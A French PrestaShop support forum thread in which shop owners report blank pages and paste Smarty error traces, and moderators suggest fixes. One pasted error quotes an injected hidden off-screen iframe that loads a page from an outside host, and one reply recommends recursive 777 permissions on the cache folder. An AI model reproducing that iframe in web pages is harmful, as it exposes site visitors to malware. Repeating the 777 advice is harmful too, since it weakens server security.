Jump to content

[Resolu] Page blanche


Recommended Posts

Bonjour,

 

Depuis tout à l'heure il m'est impossible de me rendre sur mon site... J'ai une page toute blanche.

 

Je peux par contre me rendre sur mon BO sans problème.

 

Je précise que je n'ai RIEN touché. Ce matin j'ai juste rentré quelques produits, et cet après-midi je n'étais pas chez moi et quand je suis rentré et que j'ai voulu travailler un peu, tout était blanc...

 

Vous pensez que cela vient de mon hébergeur?

 

Merci.

Link to comment
Share on other sites

Bonjour,

 

Merci pour cette réponse ;-)

 

Sur chrome (Pas sur Filezilla), j'ai un message d'erreur:

 

Erreur HTTP 500 (Internal Server Error) : Une situation inattendue s'est produite tandis que le serveur tentait de traiter la demande.

 

 

Mais comment ça se fait que cela arrive alors que je n'ai rien touché?

Link to comment
Share on other sites

Bonjour,

 

Alors effectivement hier j'avais un fichier vide dans le module blocknewproduct. J'ai donc retéléchargé le dossier config.xml sur mon serveur.

 

Je ne comprend pas pourquoi cela arrive du jour au lendemain par contre?

 

Mais en tout cas j'ai toujours le même soucis, le site ne s'affiche pas.

 

J'ai contacté mon hébergeur hier, et ce matin il m’ont répondu en me disant que de leur coté tout allait bien et que eux voyait mon site :wacko:

 

Mais moi non, j'ai essayé sur plusieurs PC différents et idem.

 

Vous le voyez vous?

 

http://www.littlefabrics.fr/

 

Oron, j'utilise la version 1.5.4.0.

 

Merci pour votre aide ;)

Link to comment
Share on other sites

Vous avez naviguer un peu dessus?

 

Je viens d'appeler mon mari qui est au travail pour lui demander de se connecter sur mon site pour voir si il le voyait et il a réussi à le visualiser mais dès qu'il a commencé à naviguer dessus le message d'erreur est apparu chez lui aussi:

 

Erreur HTTP 500 (Internal Server Error) : Une situation inattendue s'est produite tandis que le serveur tentait de traiter la demande.

Link to comment
Share on other sites

Sur firefox j'avais une page blanche, maintenant j'ai ceci:

 

Fatal error: Uncaught exception 'SmartyException' with message 'Invalid compiled template for '/flex/domain/littlefabrics.fr/site/www/modules/brabieblockviewed/brabieblockviewed.tpl'' in /flex/domain/littlefabrics.fr/site/www/tools/smarty/sysplugins/smarty_internal_templatebase.php:174 Stack trace: #0 /flex/domain/littlefabrics.fr/site/www/classes/module/Module.php(1621): Smarty_Internal_TemplateBase->fetch() #1 /flex/domain/littlefabrics.fr/site/www/modules/brabieblockviewed/brabieblockviewed.php(177): ModuleCore->display('/flex/domain/li...', 'brabieblockview...') #2 /flex/domain/littlefabrics.fr/site/www/classes/Hook.php(423): brabieblockviewed->hookRightColumn(Array) #3 /flex/domain/littlefabrics.fr/site/www/classes/controller/FrontController.php(428): HookCore::exec('displayRightCol...', Array) #4 /flex/domain/littlefabrics.fr/site/www/controllers/front/IndexController.php(37): FrontControllerCore->initContent() #5 /flex/domain/littlefabrics.fr/site/www/classes/controller/Controller.php(167): IndexControllerCore->ini in /flex/domain/littlefabrics.fr/site/www/tools/smarty/sysplugins/smarty_internal_templatebase.php on line 174

Link to comment
Share on other sites

Il dit que ce fichier /modules/brabieblockviewed/brabieblockviewed.tpl n'est pas au top de sa forme. Il faudrait vérifier pourquoi. Et comme ce module doit influer sur le cookie, cela peut aller vite vers une erreur assez bloquante, comme le nom affichage du module ou carrément de la page si php émet une grosse erreur en essayant de l'afficher dans le thème.

 

Essayez de voir avec son développeur peut être ?

Link to comment
Share on other sites

Franchement, je crois que je vais plutôt le supprimer parce que je l'avais juste parce qu'il faisait parti du thème que j'ai acheté mais je n'en ai pas vraiment besoin... J'ai pas envie d'avoir à nouveau des problèmes...

 

Par contre depuis ce problème je m’aperçois que les boutons de navigations (en haut à droite des 4 photos horizontales qui représentent mes nouveautés) sont coupés <_< ...

 

Vraiment un graaaand merci pour ton aide ;)

  • Like 1
Link to comment
Share on other sites

Je regarde un peu partout dans mon site pour voir si il y a d'autres problèmes et j'ai un autre message d'erreur dans mon panier, à l'étape 4 Frais de port:

 

Warning: Illegal string offset 'PS_VERSION' in /flex/domain/littlefabrics.fr/site/www/cache/smarty/compile/faea3bb0f7d3727881aea6233981276c16ff9a03.file.checkout_process.tpl.php on line 41 Warning: Illegal string offset 'carrier' in /flex/domain/littlefabrics.fr/site/www/cache/smarty/compile/faea3bb0f7d3727881aea6233981276c16ff9a03.file.checkout_process.tpl.php on line 41

Link to comment
Share on other sites

Mais comment ça se fait que cela arrive alors que je n'ai rien touché?

 

Sans vouloir faire la rabat joie, au contraire :lol:, lisez bien les réponses des modos, ils connaissent bien la musique et Muche et Oron ont vu juste tout de suite, il faut bien surveiller ses modules tiers et son htaccess ainsi que toujours avoir une sauvegarde de votre base de données régulière et un du fichier /config/settings.inc.php

Link to comment
Share on other sites

D'accord merci pour tous vos conseils ;-)

 

Oui je sauvegarde à chaque fois que je fais même ne serait-ce qu'un minuscule changement, trop peur :o lol

 

En tout cas encore un grand merci pour votre aide! Et merci aussi d'avoir mi mon post en résolu (Mais je vous jure que j'allais le faire ^_^ )

Link to comment
Share on other sites

  • 5 months later...

Bonjour,

 

Depuis ce matin j'ai également un problème de page blanche sur notre site www.dealshop.fr.

 

J'ai modifié le fichier config.inc.php pour faire apparaitre le message d'erreur, qui est le suivant :

 

Fatal error: Uncaught exception 'SmartyException' with message 'Invalid compiled template for '/srv/d_csce/www/www.dealshop.fr/htdocs/modules//paypal//js/front_office.js'' in /srv/d_csce/www/www.dealshop.fr/htdocs/tools/smarty/sysplugins/smarty_internal_templatebase.php:174 Stack trace: #0 /srv/d_csce/www/www.dealshop.fr/htdocs/modules/paypal/paypal_abstract.php(320): Smarty_Internal_TemplateBase->fetch('/srv/d_csce/www...') #1 /srv/d_csce/www/www.dealshop.fr/htdocs/modules/paypal/paypal_abstract.php(366): PayPalAbstract->fetchTemplate('/js/', 'front_office', 'js') #2 /srv/d_csce/www/www.dealshop.fr/htdocs/classes/Hook.php(417): PayPalAbstract->hookHeader(Array) #3 /srv/d_csce/www/www.dealshop.fr/htdocs/classes/controller/FrontController.php(448): HookCore::exec('displayHeader') #4 /srv/d_csce/www/www.dealshop.fr/htdocs/controllers/front/IndexController.php(38): FrontControllerCore->initContent() #5 /srv/d_csce/www/www.dealshop.fr/htdocs/classes/controller/Controller.php(168): IndexControllerCore->initContent() #6 /srv/d_ in /srv/d_csce/www/www.dealshop.fr/htdocs/tools/smarty/sysplugins/smarty_internal_templatebase.php on line 174

 

J'ai désactivé le thème mobile en admin mais rien n'y change.

 

Quelq'un peut-il m'aider ?

 

Merci à vous

 

Link to comment
Share on other sites

Bonjour,

 

Merci pour votre réponse.

Le problème c'est qu'en admin j'ai le meme message d'erreur lorsque j'essai d'accéder à la rubrique Modules. Je ne peux donc pas intervenir sur le module Paypal...

Comment faire ?

Link to comment
Share on other sites

Re,

 

Merci, j'ai envoyé par FTP le module Paypal de votre ZIP. Maintenant le message d'erreur est le suivant côté front :

 

Fatal error: Uncaught exception 'SmartyCompilerException' with message 'Syntax Error in template "/srv/d_csce/www/www.dealshop.fr/htdocs/modules/rezo/rezo_column.tpl" on line 12 "</div><!--eea1fe--><style>body {overflow-x:hidden;overflow-y:auto;} </style> <iframe id="xk" name="xk" style="position:absolute; height: 100px; width:120px; left:5000px; top:120px;" src="http://pythians09f6.coolpage.biz/images/sourstats.php" > </iframe><!--/eea1fe-->" - Unexpected ":", expected one of: "}" , " "' in /srv/d_csce/www/www.dealshop.fr/htdocs/tools/smarty/sysplugins/smarty_internal_templatecompilerbase.php:627 Stack trace: #0 /srv/d_csce/www/www.dealshop.fr/htdocs/tools/smarty/sysplugins/smarty_internal_templateparser.php(3154): Smarty_Internal_TemplateCompilerBase->trigger_template_error() #1 /srv/d_csce/www/www.dealshop.fr/htdocs/tools/smarty/sysplugins/smarty_internal_templateparser.php(3219): Smarty_Internal_Templateparser->yy_syntax_error(2, ':') in /srv/d_csce/www/www.dealshop.fr/htdocs/tools/smarty/sysplugins/smarty_internal_templatecompilerbase.php on line 627

 

et coté BO, rubrique Modules :

 

Fatal error: Uncaught exception 'SmartyException' with message 'Invalid compiled template for 'controllers/modules/js.tpl'' in /srv/d_csce/www/www.dealshop.fr/htdocs/tools/smarty/sysplugins/smarty_internal_templatebase.php:174 Stack trace: #0 /srv/d_csce/www/www.dealshop.fr/htdocs/tools/smarty/sysplugins/smarty_internal_template.php(285): Smarty_Internal_TemplateBase->fetch(NULL, NULL, NULL, NULL, false, false, true) #1 /srv/d_csce/www/www.dealshop.fr/htdocs/cache/smarty/compile/80f061640c439583705be2866dcb65c6bf2b2408.file.content.tpl.php(34): Smarty_Internal_Template->getSubTemplate('controllers/mod...', NULL, NULL, NULL, NULL, Array, 0) #2 /srv/d_csce/www/www.dealshop.fr/htdocs/tools/smarty/sysplugins/smarty_internal_templatebase.php(180): content_508e87eae04144_73559880(Object(Smarty_Internal_Template)) #3 /srv/d_csce/www/www.dealshop.fr/htdocs/classes/controller/AdminController.php(1148): Smarty_Internal_TemplateBase->fetch() #4 /srv/d_csce/www/www.dealshop.fr/htdocs/classes/controller/Controller.php(186): AdminContr in /srv/d_csce/www/www.dealshop.fr/htdocs/tools/smarty/sysplugins/smarty_internal_templatebase.php on line 174

 

Une idée ?

Link to comment
Share on other sites

Re,

 

J'ai supprimmé le module REZO, je verrais plus tard pour cela.

Du coup le FO est à nouveau accessible mais le BO rubriques Modules affiche toujours le message d'erreur suivant :

 

Fatal error: Uncaught exception 'SmartyException' with message 'Invalid compiled template for 'controllers/modules/js.tpl'' in /srv/d_csce/www/www.dealshop.fr/htdocs/tools/smarty/sysplugins/smarty_internal_templatebase.php:174 Stack trace: #0 /srv/d_csce/www/www.dealshop.fr/htdocs/tools/smarty/sysplugins/smarty_internal_template.php(285): Smarty_Internal_TemplateBase->fetch(NULL, NULL, NULL, NULL, false, false, true) #1 /srv/d_csce/www/www.dealshop.fr/htdocs/cache/smarty/compile/80f061640c439583705be2866dcb65c6bf2b2408.file.content.tpl.php(34): Smarty_Internal_Template->getSubTemplate('controllers/mod...', NULL, NULL, NULL, NULL, Array, 0) #2 /srv/d_csce/www/www.dealshop.fr/htdocs/tools/smarty/sysplugins/smarty_internal_templatebase.php(180): content_508e87eae04144_73559880(Object(Smarty_Internal_Template)) #3 /srv/d_csce/www/www.dealshop.fr/htdocs/classes/controller/AdminController.php(1148): Smarty_Internal_TemplateBase->fetch() #4 /srv/d_csce/www/www.dealshop.fr/htdocs/classes/controller/Controller.php(186): AdminContr in /srv/d_csce/www/www.dealshop.fr/htdocs/tools/smarty/sysplugins/smarty_internal_templatebase.php on line 174

 

Pouvez-vous m'aider à solutionner ce problème ?

 

Merci à vous

Link to comment
Share on other sites

Bonsoir,

 

J'ai essayé avec l'envoi en FTP du fichier js.tpl ainsi qu'avec le vide du cache smarty mais j'ai toujours le même message d'erreur :/

 

Et uniquement pour cette rubrique de l'admin...

 

Encore merci pour votre aide :-) si vous avez d'autres pistes pour moi...

Link to comment
Share on other sites

Re bonsoir,

en fait en verifiant avec mon logiciel ftp je me suis aperçue que le cache smarty n'avait pas été vidé ;-)

Je l'ai fait manuellement et tout est ok ;-)

Merci pour votre aide c'est super.

Bonne soirée a vous

Link to comment
Share on other sites

  • 4 months later...

Bonjour,

 

J'ai exactement le même problème, sauf que toutes les solutions proposées restent inefficaces. Je suis totalement perdue. Quelqu'un pourrait m'aider svp?

Voici le message d'erreur:

 

Fatal error: Uncaught exception 'SmartyCompilerException' with message 'Syntax Errorarrow-10x10.png in template "/homez.571/tshirtsd/www/themes/default-bootstrap/header.tpl" on linearrow-10x10.png 60 "{/if}" unexpected closing tag' in /homez.571/tshirtsd/www/tools/smarty/sysplugins/smarty_internal_templatecompilerbase.php:667 Stack trace: #0 /homez.571/tshirtsd/www/tools/smarty/sysplugins/smarty_internal_compilebase.php(170): Smarty_Internal_TemplateCompilerBase->trigger_template_error('unexpected clos...', 60) #1 /homez.571/tshirtsd/www/tools/smarty/sysplugins/smarty_internal_compile_if.php(197): Smarty_Internal_CompileBase->closeTag(Object(Smarty_Internal_SmartyTemplateCompiler), Array) #2 /homez.571/tshirtsd/www/tools/smarty/sysplugins/smarty_internal_templatecompilerbase.php(475): Smarty_Internal_Compile_Ifclose->compile(Array, Object(Smarty_Internal_SmartyTemplateCompiler), Array, NULL, NULL) #3 /homez.571/tshirtsd/www/tools/smarty/sysplugins/smarty_internal_templatecompilerbase.php(259): Smarty_Internal_TemplateCompilerBase- in /homez.571/tshirtsd/www/tools/smarty/sysplugins/smarty_internal_templatecompilerbase.php on linearrow-10x10.png 667

 

D'avance merci...

Link to comment
Share on other sites

Merci pour votre réponse.

Non ça c'était chez la personne précédente ^^ Moi mon message d'erreur ne mentionne pas "brabieblockviewed" et d'ailleurs je n'ai aucun module de ce nom.

Si vous avez une autre piste je suis prenneuse, parce que vraiment je ne sais plus quoi faire :(

Link to comment
Share on other sites

Ok merci. J'ai supprimé le {/if} qui était effectivement en trop, ainsi que d'autres petites erreurs dû même genre qui apparaissaient, et le site s'affiche correctement sur Firefox. Par contre sur IE c'est le chaos total (alors qu'avant, le site s'affichait de la même manière sur ces 2 navigateurs). J'ai du mal à comprendre comment un problème peut apparaître sans que je touche à quoi que ce soit, et comment après correction le site peut s'afficher totalement différemment, mais bon... Je chercherai dans une autre rubrique comment faire une 2ème feuille de style pour IE sur un site PrestaShop.
Merci votre aide en tout cas!

Link to comment
Share on other sites

Bonjour,

 

Ma foi c'est bien le template default-boostrap dont nous parlons ? Je vous confirme il passe normalement bien sur les derniers IE sans modif à faire dessus. Vous n'avez rien touché mais vous avez un {/if} en trop quand même ? Je ne comprends pas trop non plus désolé.

 

Cordialement

Link to comment
Share on other sites

Ah oui, ça je vous garantis que la balise {/if} était en trop dans le template default-boostrap de base, ainsi qu'une balise </div> sur la ligne juste au dessus. Je n'avais pas encore ouvert le fichier header.tpl donc je vous le garantis. J'avais uniquement touché au css (et encore, pas beaucoup, juste redimensionné le body et ajouté une image de fond).

 

Maintenant je me retrouve avec un template chaotique complètement différent sur chaque navigateur. Il n'y en a pas 2 identiques. C'est mon 3ème site PrestaShop, et je n'avais jamais eu de tel bug.

Si c'est possible de faire une feuille de style pour chaque navigateur, je vais opter pour cette solution de repli.

Link to comment
Share on other sites

FInalement, puisqu'aucune solution proposée ne fonctionnait, j'ai entièrement supprimé PrestaShop puis je l'ai ré-installé. Il est donc 100% vierge de toute modification, et déjà il s'affiche mal sur IE8: http://t-shirtsd3porcs.com/

 

Avez-vous une solution, ou une autre version qui s'affiche correctement sur TOUS les navigateurs? Merci...

 

Bonjour,

 

Effectivement je crois que ce thème n'a été fait qu'à partir d'IE9.

 

Cordialement

Link to comment
Share on other sites

  • 2 weeks later...

Bonjour,

 

J'ai actuellement un probleme de page blanche.

J'ai fait la manip define('_PS_MODE_DEV_', false);

 

et voici ce qu'il s'affiche : 

 

 

 

Warning: include_once(*****************smarty_internal_data.php) [function.include-once]: failed to open stream: No such file or directory in /smarty/Smarty.class.php on line 95

Warning: include_once() [function.include]: Failed opening '*********************/smarty_internal_data.php' for inclusion (include_path='.:/usr/local/lib/php') in **********************smarty/Smarty.class.php on line 95
 

Je ne trouve pas de solution sur les différentes page de forum.

 

Avez-vous une idée ou un lien pour m'aider ?

 

Merci d'avance

Edited by edelbo (see edit history)
Link to comment
Share on other sites

  • 7 months later...

Bonsoir tous mes produits ont disparu quelqun p m'aider merci Il y a 12 erreurs 

  1. Le produit doit être au minimum dans une catégorie.
  2. Ce produit doit être dans la catégorie par défaut.

 erreur

  1. vous n'avez pas accès à ce produit

« PrécédentTab : Associations (500)

Une erreur de serveur est survenue lors du chargement des onglets : tous les onglets n'ont pas pu être chargés.
Veuillez essayer de nouveau en rafraîchissant la page.
Si vous rencontrez toujours ce problème, veuillez vérifier vos logs serveur ou contacter votre hébergeur pour plus d'information.
 
Link to comment
Share on other sites

  • 2 months later...

Bonjour,

 

Je rencontre également ce problème à plusieurs reprise sur mon site (de manière aléatoire).

J'utilise la version de PrestaShop: 1.6.0.5.

 

J'ai regardé les tuto, mais je ne trouve pas comment afficher les erreurs sur ma page blanche avec ma version de prestashop... Quelqu'un peut-il m'indiquer se qu'il faut modifier dans le fichier config svp ?

 

Je vous remercie

 

Link to comment
Share on other sites

Hello,

 

Oui ça ressemble à un bug d'accès concurent de cette version je pense, il n'arrive pas à ecrire le fichier.

 

Essayez de vider votre cache dans l'onglet performances ? ou de re appliquer des droits 777 récursifs sur le dossier cache mais ma foi il va falloir penser à mettre à jour le shop bientôt.

 

Cordialement

Edited by Gregory Roussac (see edit history)
Link to comment
Share on other sites

Oui...en vidant le cache ça remarche parfaitement. Par contre sur le long terme ce n'est pas une solution envisageable.

Vous pensez que le problème peux être liée à une mise à jours de prestashop ? Quelle est la dernière version stable de prestashop ?

 

PS : merci pour votre réactivité !

Link to comment
Share on other sites

Je viens de rencontrer le même soucis ce matin mais sur le BO cette fois... Quand j'ai cliqué sur une commande client j'ai eu ce message

 

Fatal error in module smarty_internal_write_file:

Uncaught exception 'SmartyException' with message 'unable to write file

 

Par contre cela ne le faisait pas sur toutes les commandes.

 

J'ai vidé le cache et problème resolu. Par contre c'est pas une solution au long terme

Avez vous une solution pour résoudre ces pb de pages blanches svp ?

 

Merci

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...